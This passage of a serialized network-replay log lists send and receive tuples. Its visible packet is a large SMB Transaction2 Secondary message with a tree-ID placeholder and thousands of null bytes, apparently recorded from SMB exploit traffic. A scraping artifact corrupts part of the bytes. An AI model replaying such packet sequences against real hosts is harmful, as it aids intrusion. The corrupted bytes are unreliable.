0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x83\\\\xf3h6agLCqPqVyXi2VSQ8O6Yb9ijBX54jY6KM+sz33NmS6TK8XlOk920s0E0aajOV++wrR92ds1FOLBO+evLPj4sI